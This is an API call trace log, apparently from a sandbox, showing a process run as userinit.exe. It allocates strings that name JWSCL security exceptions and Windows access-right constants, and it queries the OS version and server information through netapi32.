[0179.669] SysReAllocStringLen (in: pbstr=0x2a3efb8*=0x0, psz="EJwsclAccessTypeException", len=0x19 | out: pbstr=0x2a3efb8*="EJwsclAccessTypeException") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3efa0*=0x0, psz="EJwsclAdjustPrivilegeException", len=0x1e | out: pbstr=0x2a3efa0*="EJwsclAdjustPrivilegeException") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3ef88*=0x0, psz="EJwsclPrivilegeCheckException", len=0x1d | out: pbstr=0x2a3ef88*="EJwsclPrivilegeCheckException") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3ef70*=0x0, psz="EJwsclPrivilegeNotFoundException", len=0x20 | out: pbstr=0x2a3ef70*="EJwsclPrivilegeNotFoundException") returned 1
[0179.670] SysReAllocStringLen (in: pbstr=0x2a3ef58*=0x0, psz="EJwsclInvalidIndexPrivilegeException", len=0x24 | out: pbstr=0x2a3ef58*="EJwsclInvalidIndexPrivilegeException") returned 1
[0179.670] SysReAllocStringLen (in: pbstr=0x2a3ef40*=0x0, psz="EJwsclPrivilegeException", len=0x18 | out: pbstr=0x2a3ef40*="EJwsclPrivilegeException") returned 1
[0179.670] SysReAllocStringLen (in: pbstr=0x2a3ef28*=0x0, psz="EJwsclNotEnoughMemory", len=0x15 | out: pbstr=0x2a3ef28*="EJwsclNotEnoughMemory") returned 1
[0179.670] SysReAllocStringLen (in: pbstr=0x2a3ef10*=0x0, psz="EJwsclInvalidTokenHandle", len=0x18 | out: pbstr=0x2a3ef10*="EJwsclInvalidTokenHandle") returned 1
[0179.670] SysReAllocStringLen (in: pbstr=0x2a3eef8*=0x0, psz="EJwsclNoThreadTokenAvailable", len=0x1c | out: pbstr=0x2a3eef8*="EJwsclNoThreadTokenAvailable") returned 1
[0179.670] SysReAllocStringLen (in: pbstr=0x2a3eee0*=0x0, psz="EJwsclDuplicateTokenException", len=0x1d | out: pbstr=0x2a3eee0*="EJwsclDuplicateTokenException") returned 1
[0179.670] SysReAllocStringLen (in: pbstr=0x2a3eec8*=0x0, psz="EJwsclInvalidOwnerException", len=0x1b | out: pbstr=0x2a3eec8*="EJwsclInvalidOwnerException") returned 1
[0179.670] SysReAllocStringLen (in: pbstr=0x2a3eeb0*=0x0, psz="EJwsclInvalidPrimaryToken", len=0x19 | out: pbstr=0x2a3eeb0*="EJwsclInvalidPrimaryToken") returned 1
[0179.670] SysReAllocStringLen (in: pbstr=0x2a3ee98*=0x0, psz="EJwsclTokenPrimaryException", len=0x1b | out: pbstr=0x2a3ee98*="EJwsclTokenPrimaryException") returned 1
[0179.670] SysReAllocStringLen (in: pbstr=0x2a3ee80*=0x0, psz="EJwsclTokenImpersonationException", len=0x21 | out: pbstr=0x2a3ee80*="EJwsclTokenImpersonationException") returned 1
[0179.670] SysReAllocStringLen (in: pbstr=0x2a3ee68*=0x0, psz="EJwsclTokenInformationException", len=0x1f | out: pbstr=0x2a3ee68*="EJwsclTokenInformationException") returned 1
[0179.670] SysReAllocStringLen (in: pbstr=0x2a3ee50*=0x0, psz="EJwsclSharedTokenException", len=0x1a | out: pbstr=0x2a3ee50*="EJwsclSharedTokenException") returned 1
[0179.670] SysReAllocStringLen (in: pbstr=0x2a3ee38*=0x0, psz="EJwsclOpenProcessTokenException", len=0x1f | out: pbstr=0x2a3ee38*="EJwsclOpenProcessTokenException") returned 1
[0179.670] SysReAllocStringLen (in: pbstr=0x2a3ee20*=0x0, psz="EJwsclOpenThreadTokenException", len=0x1e | out: pbstr=0x2a3ee20*="EJwsclOpenThreadTokenException") returned 1
[0179.670] SysReAllocStringLen (in: pbstr=0x2a3ee08*=0x0, psz="EJwsclSecurityException", len=0x17 | out: pbstr=0x2a3ee08*="EJwsclSecurityException") returned 1
[0179.670] SysReAllocStringLen (in: pbstr=0x2a3edf0*=0x0, psz="Exception", len=0x9 | out: pbstr=0x2a3edf0*="Exception") returned 1
[0179.670] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0179.670] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0179.670] GetVersionExA (in: lpVersionInformation=0x20f4e4*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x76a6ea43, dwMinorVersion=0x8f0000, dwBuildNumber=0x0, dwPlatformId=0x10, szCSDVersion="\x0cõ ") | out: lpVersionInformation=0x20f4e4*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0179.670] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x0
[0179.670] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x73b10000
[0179.730] GetProcAddress (hModule=0x73b10000, lpProcName="NetServerGetInfo") returned 0x74f13cfa
[0179.730] NetServerGetInfo (in: servername="", level=0x65, bufptr=0x20f568 | out: bufptr=0x20f568) returned 0x0
[0179.784] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x73b10000
[0179.784] GetProcAddress (hModule=0x73b10000, lpProcName="NetApiBufferFree") returned 0x73b013d2
[0179.784] NetApiBufferFree (Buffer=0x911d00) returned 0x0
[0179.785] SetErrorMode (uMode=0x8000) returned 0x1
[0179.785] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x758f0000
[0179.785] SetErrorMode (uMode=0x1) returned 0x8000
[0179.785] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0179.787] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0179.788] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0179.790] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0179.791] SysReAllocStringLen (in: pbstr=0x2a3ec40*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3ec40*="DELETE") returned 1
[0179.791] SysReAllocStringLen (in: pbstr=0x2a3ec30*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3ec30*="READ_CONTROL") returned 1
[0179.791] SysReAllocStringLen (in: pbstr=0x2a3ec20*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3ec20*="WRITE_OWNER") returned 1
[0179.791] SysReAllocStringLen (in: pbstr=0x2a3ec10*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3ec10*="WRITE_DAC") returned 1
[0179.791] SysReAllocStringLen (in: pbstr=0x2a3ec00*=0x0, psz="FILE_WRITE_ATTRIBUTES", len=0x15 | out: pbstr=0x2a3ec00*="FILE_WRITE_ATTRIBUTES") returned 1
[0179.791] SysReAllocStringLen (in: pbstr=0x2a3ebf0*=0x0, psz="FILE_READ_ATTRIBUTES", len=0x14 | out: pbstr=0x2a3ebf0*="FILE_READ_ATTRIBUTES") returned 1
[0179.791] SysReAllocStringLen (in: pbstr=0x2a3ebe0*=0x0, psz="FILE_CREATE_PIPE_INSTANCE", len=0x19 | out: pbstr=0x2a3ebe0*="FILE_CREATE_PIPE_INSTANCE") returned 1
[0179.791] SysReAllocStringLen (in: pbstr=0x2a3ebd0*=0x0, psz="FILE_WRITE_DATA", len=0xf | out: pbstr=0x2a3ebd0*="FILE_WRITE_DATA") returned 1
[0179.791] SysReAllocStringLen (in: pbstr=0x2a3ebc0*=0x0, psz="FILE_READ_DATA", len=0xe | out: pbstr=0x2a3ebc0*="FILE_READ_DATA") returned 1
[0179.791] SysReAllocStringLen (in: pbstr=0x2a3ebb0*=0x0, psz="FILE_ALL_ACCESS", len=0xf | out: pbstr=0x2a3ebb0*="FILE_ALL_ACCESS") returned 1
[0179.791] SysReAllocStringLen (in: pbstr=0x2a3eba0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3eba0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0179.791] SysReAllocStringLen (in: pbstr=0x2a3eb90*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3eb90*="STANDARD_RIGHTS_WRITE") returned 1
[0179.791] SysReAllocStringLen (in: pbstr=0x2a3eb80*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3eb80*="STANDARD_RIGHTS_READ") returned 1
[0179.791] SysReAllocStringLen (in: pbstr=0x2a3eb70*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3eb70*="STANDARD_RIGHTS_ALL") returned 1
[0179.791] SysReAllocStringLen (in: pbstr=0x2a3eb50*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3eb50*="DELETE") returned 1
[0179.791] SysReAllocStringLen (in: pbstr=0x2a3eb40*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3eb40*="READ_CONTROL") returned 1
[0179.791] SysReAllocStringLen (in: pbstr=0x2a3eb30*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3eb30*="WRITE_OWNER") returned 1
[0179.791] SysReAllocStringLen (in: pbstr=0x2a3eb20*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3eb20*="WRITE_DAC") returned 1
[0179.791] SysReAllocStringLen (in: pbstr=0x2a3eb10*=0x0, psz="TOKEN_ADJUST_SESSIONID", len=0x16 | out: pbstr=0x2a3eb10*="TOKEN_ADJUST_SESSIONID") returned 1
[0179.791] SysReAllocStringLen (in: pbstr=0x2a3eb00*=0x0, psz="TOKEN_ADJUST_DEFAULT", len=0x14 | out: pbstr=0x2a3eb00*="TOKEN_ADJUST_DEFAULT") returned 1
[0179.791] SysReAllocStringLen (in: pbstr=0x2a3eaf0*=0x0, psz="TOKEN_ADJUST_GROUPS", len=0x13 | out: pbstr=0x2a3eaf0*="TOKEN_ADJUST_GROUPS") returned 1
[0179.791] SysReAllocStringLen (in: pbstr=0x2a3eae0*=0x0, psz="TOKEN_ADJUST_PRIVILEGES", len=0x17 | out: pbstr=0x2a3eae0*="TOKEN_ADJUST_PRIVILEGES") returned 1
[0179.791] SysReAllocStringLen (in: pbstr=0x2a3ead0*=0x0, psz="TOKEN_QUERY_SOURCE", len=0x12 | out: pbstr=0x2a3ead0*="TOKEN_QUERY_SOURCE") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3eac0*=0x0, psz="TOKEN_QUERY", len=0xb | out: pbstr=0x2a3eac0*="TOKEN_QUERY") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3eab0*=0x0, psz="TOKEN_IMPERSONATE", len=0x11 | out: pbstr=0x2a3eab0*="TOKEN_IMPERSONATE") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3eaa0*=0x0, psz="TOKEN_DUPLICATE", len=0xf | out: pbstr=0x2a3eaa0*="TOKEN_DUPLICATE") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3ea90*=0x0, psz="TOKEN_ASSIGN_PRIMARY", len=0x14 | out: pbstr=0x2a3ea90*="TOKEN_ASSIGN_PRIMARY") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3ea80*=0x0, psz="TOKEN_ALL_ACCESS", len=0x10 | out: pbstr=0x2a3ea80*="TOKEN_ALL_ACCESS") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3ea70*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3ea70*="STANDARD_RIGHTS_EXECUTE") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3ea60*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3ea60*="STANDARD_RIGHTS_WRITE") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3ea50*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3ea50*="STANDARD_RIGHTS_READ") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3ea40*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3ea40*="STANDARD_RIGHTS_ALL") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3ea30*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3ea30*="DELETE") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3ea20*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3ea20*="READ_CONTROL") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3ea10*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3ea10*="WRITE_OWNER") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3ea00*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3ea00*="WRITE_DAC") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3e9f0*=0x0, psz="TIMER_MODIFY_STATE", len=0x12 | out: pbstr=0x2a3e9f0*="TIMER_MODIFY_STATE") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3e9e0*=0x0, psz="TIMER_QUERY_STATE", len=0x11 | out: pbstr=0x2a3e9e0*="TIMER_QUERY_STATE") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3e9d0*=0x0, psz="TIMER_ALL_ACCESS", len=0x10 | out: pbstr=0x2a3e9d0*="TIMER_ALL_ACCESS") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3e9c0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e9c0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3e9b0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e9b0*="STANDARD_RIGHTS_WRITE") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3e9a0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e9a0*="STANDARD_RIGHTS_READ") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3e990*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e990*="STANDARD_RIGHTS_ALL") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3e980*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e980*="DELETE") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3e970*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e970*="READ_CONTROL") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3e960*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e960*="WRITE_OWNER") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3e950*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e950*="WRITE_DAC") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3e940*=0x0, psz="SECTION_EXTEND_SIZE", len=0x13 | out: pbstr=0x2a3e940*="SECTION_EXTEND_SIZE") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3e930*=0x0, psz="FILE_MAP_READ", len=0xd | out: pbstr=0x2a3e930*="FILE_MAP_READ") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3e920*=0x0, psz="FILE_MAP_WRITE", len=0xe | out: pbstr=0x2a3e920*="FILE_MAP_WRITE") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3e910*=0x0, psz="FILE_MAP_COPY", len=0xd | out: pbstr=0x2a3e910*="FILE_MAP_COPY") returned 1
[0179.792] SysReAllocStringLen (in: pbstr=0x2a3e900*=0x0, psz="FILE_MAP_ALL_ACCESS", len=0x13 | out: pbstr=0x2a3e900*="FILE_MAP_ALL_ACCESS") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e8f0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e8f0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e8e0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e8e0*="STANDARD_RIGHTS_WRITE") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e8d0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e8d0*="STANDARD_RIGHTS_READ") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e8c0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e8c0*="STANDARD_RIGHTS_ALL") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e8b0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e8b0*="DELETE") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e8a0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e8a0*="READ_CONTROL") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e890*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e890*="WRITE_OWNER") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e880*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e880*="WRITE_DAC") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e870*=0x0, psz="MUTEX_MODIFY_STATE", len=0x12 | out: pbstr=0x2a3e870*="MUTEX_MODIFY_STATE") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e860*=0x0, psz="MUTEX_ALL_ACCESS", len=0x10 | out: pbstr=0x2a3e860*="MUTEX_ALL_ACCESS") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e850*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e850*="STANDARD_RIGHTS_EXECUTE") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e840*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e840*="STANDARD_RIGHTS_WRITE") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e830*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e830*="STANDARD_RIGHTS_READ") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e820*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e820*="STANDARD_RIGHTS_ALL") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e810*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e810*="DELETE") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e800*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e800*="READ_CONTROL") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e7f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e7f0*="WRITE_OWNER") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e7e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e7e0*="WRITE_DAC") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e7d0*=0x0, psz="EVENT_MODIFY_STATE", len=0x12 | out: pbstr=0x2a3e7d0*="EVENT_MODIFY_STATE") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e7c0*=0x0, psz="EVENT_ALL_ACCESS", len=0x10 | out: pbstr=0x2a3e7c0*="EVENT_ALL_ACCESS") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e7b0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e7b0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e7a0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e7a0*="STANDARD_RIGHTS_WRITE") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e790*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e790*="STANDARD_RIGHTS_READ") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e780*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e780*="STANDARD_RIGHTS_ALL") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e770*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e770*="DELETE") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e760*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e760*="READ_CONTROL") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e750*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e750*="WRITE_OWNER") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e740*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e740*="WRITE_DAC") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e730*=0x0, psz="SEMAPHORE_MODIFY_STATE", len=0x16 | out: pbstr=0x2a3e730*="SEMAPHORE_MODIFY_STATE") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e720*=0x0, psz="SEMAPHORE_ALL_ACCESS", len=0x14 | out: pbstr=0x2a3e720*="SEMAPHORE_ALL_ACCESS") returned 1
[0179.793] SysReAllocStringLen (in: pbstr=0x2a3e710*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e710*="STANDARD_RIGHTS_EXECUTE") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e700*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e700*="STANDARD_RIGHTS_WRITE") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e6f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e6f0*="STANDARD_RIGHTS_READ") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e6e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e6e0*="STANDARD_RIGHTS_ALL") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e6d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e6d0*="DELETE") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e6c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e6c0*="READ_CONTROL") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e6b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e6b0*="WRITE_OWNER") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e6a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e6a0*="WRITE_DAC") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e690*=0x0, psz="JOB_OBJECT_SET_SECURITY_ATTRIBUTES", len=0x22 | out: pbstr=0x2a3e690*="JOB_OBJECT_SET_SECURITY_ATTRIBUTES") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e680*=0x0, psz="JOB_OBJECT_TERMINATE", len=0x14 | out: pbstr=0x2a3e680*="JOB_OBJECT_TERMINATE") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e670*=0x0, psz="JOB_OBJECT_QUERY", len=0x10 | out: pbstr=0x2a3e670*="JOB_OBJECT_QUERY") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e660*=0x0, psz="JOB_OBJECT_SET_ATTRIBUTES", len=0x19 | out: pbstr=0x2a3e660*="JOB_OBJECT_SET_ATTRIBUTES") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e650*=0x0, psz="JOB_OBJECT_ASSIGN_PROCESS", len=0x19 | out: pbstr=0x2a3e650*="JOB_OBJECT_ASSIGN_PROCESS") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e640*=0x0, psz="JOB_OBJECT_ALL_ACCESS", len=0x15 | out: pbstr=0x2a3e640*="JOB_OBJECT_ALL_ACCESS") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e630*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e630*="STANDARD_RIGHTS_EXECUTE") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e620*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e620*="STANDARD_RIGHTS_WRITE") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e610*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e610*="STANDARD_RIGHTS_READ") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e600*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e600*="STANDARD_RIGHTS_ALL") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e5f0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e5f0*="DELETE") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e5e0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e5e0*="READ_CONTROL") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e5d0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e5d0*="WRITE_OWNER") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e5c0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e5c0*="WRITE_DAC") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e5b0*=0x0, psz="THREAD_DIRECT_IMPERSONATION", len=0x1b | out: pbstr=0x2a3e5b0*="THREAD_DIRECT_IMPERSONATION") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e5a0*=0x0, psz="THREAD_IMPERSONATE", len=0x12 | out: pbstr=0x2a3e5a0*="THREAD_IMPERSONATE") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e590*=0x0, psz="THREAD_SET_THREAD_TOKEN", len=0x17 | out: pbstr=0x2a3e590*="THREAD_SET_THREAD_TOKEN") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e580*=0x0, psz="THREAD_QUERY_INFORMATION", len=0x18 | out: pbstr=0x2a3e580*="THREAD_QUERY_INFORMATION") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e570*=0x0, psz="THREAD_SET_INFORMATION", len=0x16 | out: pbstr=0x2a3e570*="THREAD_SET_INFORMATION") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e560*=0x0, psz="THREAD_SET_CONTEXT", len=0x12 | out: pbstr=0x2a3e560*="THREAD_SET_CONTEXT") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e550*=0x0, psz="THREAD_GET_CONTEXT", len=0x12 | out: pbstr=0x2a3e550*="THREAD_GET_CONTEXT") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e540*=0x0, psz="THREAD_SUSPEND_RESUME", len=0x15 | out: pbstr=0x2a3e540*="THREAD_SUSPEND_RESUME") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e530*=0x0, psz="THREAD_TERMINATE", len=0x10 | out: pbstr=0x2a3e530*="THREAD_TERMINATE") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e520*=0x0, psz="THREAD_ALL_ACCESS", len=0x11 | out: pbstr=0x2a3e520*="THREAD_ALL_ACCESS") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e510*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e510*="STANDARD_RIGHTS_EXECUTE") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e500*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e500*="STANDARD_RIGHTS_WRITE") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e4f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e4f0*="STANDARD_RIGHTS_READ") returned 1
[0179.794] SysReAllocStringLen (in: pbstr=0x2a3e4e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e4e0*="STANDARD_RIGHTS_ALL") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e4d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e4d0*="DELETE") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e4c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e4c0*="READ_CONTROL") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e4b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e4b0*="WRITE_OWNER") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e4a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e4a0*="WRITE_DAC") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e490*=0x0, psz="PROCESS_QUERY_INFORMATION", len=0x19 | out: pbstr=0x2a3e490*="PROCESS_QUERY_INFORMATION") returned 1
